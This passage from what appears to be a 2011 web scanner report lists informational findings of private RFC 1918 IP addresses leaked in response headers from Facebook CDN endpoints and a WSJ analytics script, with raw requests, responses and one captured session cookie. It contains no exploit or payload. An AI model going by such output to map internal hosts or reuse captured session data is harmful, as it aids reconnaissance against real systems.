Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.169.62

Request

GET /safe_image.php?d=9e32027a1499cb50a819be76e4092866&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__REAL_ESTATE%2F_HOME_TYPES%2Fvegas_homes.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.169.62
X-Cnection: close
Content-Length: 8611
Vary: Accept-Encoding
Cache-Control: public, max-age=14400
Expires: Thu, 16 Jun 2011 18:19:09 GMT
Date: Thu, 16 Jun 2011 14:19:09 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

19.343. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.246.37

Request

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.246.37
X-Cnection: close
Content-Length: 20089
Vary: Accept-Encoding
Cache-Control: public, max-age=14400
Expires: Thu, 16 Jun 2011 19:26:19 GMT
Date: Thu, 16 Jun 2011 15:26:19 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

19.344. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.210.69

Request

GET /safe_image.php?d=7bce56e538a241cdc07c4eaed46d529c&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F_News%2F_SLIDESHOWS%2FVancouverHockeyRiots%2FCNBC_vancouver_hockey_riot_Cover.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.42.210.69
X-Cnection: close
Content-Length: 29734
Vary: Accept-Encoding
Cache-Control: public, max-age=14400
Expires: Thu, 16 Jun 2011 22:27:23 GMT
Date: Thu, 16 Jun 2011 18:27:23 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

19.345. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.125.49

Request

GET /safe_image.php?d=9cac76b751bd27264ad13fece17c09a6&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FSections%2FNews_And_Analysis%2F__Story_Inserts%2Fgraphics%2F__REAL_ESTATE%2F_FORECLOSURE%2Fforeclosure_sign2_200.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.125.49
X-Cnection: close
Content-Length: 10969
Vary: Accept-Encoding
Cache-Control: public, max-age=14400
Expires: Thu, 16 Jun 2011 15:25:06 GMT
Date: Thu, 16 Jun 2011 11:25:06 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

19.346. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.95.38

Request

GET /safe_image.php?d=69630606552abf367d476c30d84c9e52&url=http%3A%2F%2Fmedia.cnbc.com%2Fi%2FCNBC%2FCNBC_Images%2Fheader%2FCNBC_Logo_PS.gif HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/gif
X-FB-Server: 10.62.95.38
X-Cnection: close
Content-Length: 2462
Cache-Control: public, max-age=14400
Expires: Thu, 16 Jun 2011 15:25:06 GMT
Date: Thu, 16 Jun 2011 11:25:06 GMT
Connection: close

GIF87a2.2.....v.lh.......TTT.....D.*M....RY.\4T.p.y1.....x.........kkk.Z...........Zf......\\\...w..[Z.(..z....|.MT......LLLeb......AYa.EEE..]n......................./Q..gA..@uuu.......]b.....Il......
...[SNIP]...

19.347. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.111.41

Request

Response

HTTP/1.1 200 OK
Content-Type: image/gif
X-FB-Server: 10.54.111.41
X-Cnection: close
Content-Length: 2462
Cache-Control: public, max-age=14400
Expires: Thu, 16 Jun 2011 19:26:20 GMT
Date: Thu, 16 Jun 2011 15:26:20 GMT
Connection: close

GIF87a2.2.....v.lh.......TTT.....D.*M....RY.\4T.p.y1.....x.........kkk.Z...........Zf......\\\...w..[Z.(..z....|.MT......LLLeb......AYa.EEE..]n......................./Q..gA..@uuu.......]b.....Il......
...[SNIP]...

19.348. http://external.ak.fbcdn.net/safe_image.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.8.62

Request

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.55.8.62
X-Cnection: close
Content-Length: 6656
Vary: Accept-Encoding
Cache-Control: public, max-age=14400
Expires: Thu, 16 Jun 2011 19:26:19 GMT
Date: Thu, 16 Jun 2011 15:26:19 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!2222222222222222222222222222
...[SNIP]...

19.349. https://services.wsj.com/Gryphon/javascripts/s_code_ps.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://services.wsj.com
Path:	/Gryphon/javascripts/s_code_ps.js

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

172.26.94.60
172.26.94.68
172.26.94.70

Request

GET /Gryphon/javascripts/s_code_ps.js HTTP/1.1
Host: services.wsj.com
Connection: keep-alive
Referer: https://services.wsj.com/Gryphon/jsp/retentionController.jsp?page=160
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; s_dbfe=1305367748766; wsjregion=na%2cus; s_vnum=1310602431737%26vn%3D2; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2235%22%2C%22high%22%3A%5B%2281%22%5D%2C%22low%22%3A%5B%2265%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DThu%2C%2016%20Jun%202011%2011%3A42%3A22%20GMT%7C%7CweatherCode%3D10005; DJSESSION=continent%3Dna%7C%7Czip%3D20001-20020%7C%7Ccountry%3Dus%7C%7Cregion%3Ddc%7C%7CORCS%3Dna%2Cus%7C%7Ccity%3Dwashington%7C%7Clongitude%3D-77.0369%7C%7Ctimezone%3Dest%7C%7Clatitude%3D38.8951%7C%7CBIZO%3Dbiz%3D1080%3Bbiz%3D1027%3Bbiz%3D1053%3B; rsi_csl=lDlIlPlQlA; rsi_segs=G07608_10004|G07608_10009|G07608_10016|G07608_10017|G07608_10001; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=0000TmBX4KO-rJaV2iXrP37zo_H:-1

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:24:28 GMT
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix) DAV/2
last-modified: Fri, 29 Jan 2010 15:34:42 GMT
Content-Length: 16479
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: application/x-javascript
Content-Language: en

/* SiteCatalyst code version: H.14.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */
/* Specify the Report Suite ID(s) to track here */
var s_account="djwsjps"
var env = document.location.host
if (env.indexOf('localhost') != -1 ||env.indexOf('172.26.94.68') != -1 || env.indexOf('172.26.94.70') != -1|| env.indexOf('172.26.94.60') != -1) {
s_account="dowjdev"
}

var s=s_gi(s_account)
/************************** CONFIG SECTION **************************/
/* You may add or alter any code config here. */
s.charSet="ISO-8859-1"

...[SNIP]...

19.350. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.196

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df19998486c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a9bfff6%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.145.196
X-Cnection: close
Content-Length: 2338
Vary: Accept-Encoding
Cache-Control: public, max-age=1056
Expires: Thu, 16 Jun 2011 16:09:47 GMT
Date: Thu, 16 Jun 2011 15:52:11 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.351. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.199

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18d98a088%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a28c999%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.146.199
X-Cnection: close
Content-Length: 2338
Vary: Accept-Encoding
Cache-Control: public, max-age=716
Expires: Thu, 16 Jun 2011 16:35:10 GMT
Date: Thu, 16 Jun 2011 16:23:14 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.352. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.189

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfce684c48%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff99472368%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.148.189
X-Cnection: close
Content-Length: 2338
Vary: Accept-Encoding
Cache-Control: public, max-age=235
Expires: Thu, 16 Jun 2011 13:57:18 GMT
Date: Thu, 16 Jun 2011 13:53:23 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.353. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.190

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df334529e3c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3f366f4d8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.148.190
X-Cnection: close
Content-Length: 2338
Vary: Accept-Encoding
Cache-Control: public, max-age=579
Expires: Thu, 16 Jun 2011 12:45:32 GMT
Date: Thu, 16 Jun 2011 12:35:53 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.354. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.183

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1ed102d2%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff395dfe8a%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.17.183
Content-Length: 2338
Vary: Accept-Encoding
Cache-Control: public, max-age=423
Expires: Thu, 16 Jun 2011 14:46:56 GMT
Date: Thu, 16 Jun 2011 14:39:53 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.355. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.195

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df29b2230e8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffbe2c2ba%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.146.195
X-Cnection: close
Content-Length: 2338
Vary: Accept-Encoding
Cache-Control: public, max-age=879
Expires: Thu, 16 Jun 2011 13:52:32 GMT
Date: Thu, 16 Jun 2011 13:37:53 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.356. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.184

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27367b4d8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f3e598%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.64.184
Content-Length: 2338
Vary: Accept-Encoding
Cache-Control: public, max-age=1042
Expires: Thu, 16 Jun 2011 17:58:09 GMT
Date: Thu, 16 Jun 2011 17:40:47 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.357. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.197

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df110125f2%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff21d29845c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.146.197
X-Cnection: close
Content-Length: 2338
Vary: Accept-Encoding
Cache-Control: public, max-age=1027
Expires: Thu, 16 Jun 2011 19:20:54 GMT
Date: Thu, 16 Jun 2011 19:03:47 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.358. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.196

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d1b752b%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1eb46cff4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.147.196
X-Cnection: close
Content-Length: 2338
Vary: Accept-Encoding
Cache-Control: public, max-age=1047
Expires: Thu, 16 Jun 2011 18:55:14 GMT
Date: Thu, 16 Jun 2011 18:37:47 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.359. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.182

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a26fe16%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff25942f924%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.17.182
Content-Length: 2338
Vary: Accept-Encoding
Cache-Control: public, max-age=625
Expires: Thu, 16 Jun 2011 17:04:38 GMT
Date: Thu, 16 Jun 2011 16:54:13 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

19.360. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

